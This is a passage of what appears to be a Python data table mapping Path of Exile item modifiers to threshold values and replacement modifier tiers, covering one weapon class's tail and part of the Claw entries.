"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Bow Gems": [(3, '(2 - 3) to Quality of Socketed Bow Gems'), (5, '(4 - 6) to Quality of Socketed Bow Gems'), (10, '1 to Level of Socketed Bow Gems')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Claw": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Attack Damage Leeched as Mana')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (1 - 2) to (3 - 4) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(50, '(8 - 10) to maximum Mana'), (100, '(11 - 14) to maximum Mana'), (150, '(15 - 19) to maximum Mana'), (175, '(20 - 24) to maximum Mana'), (200, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
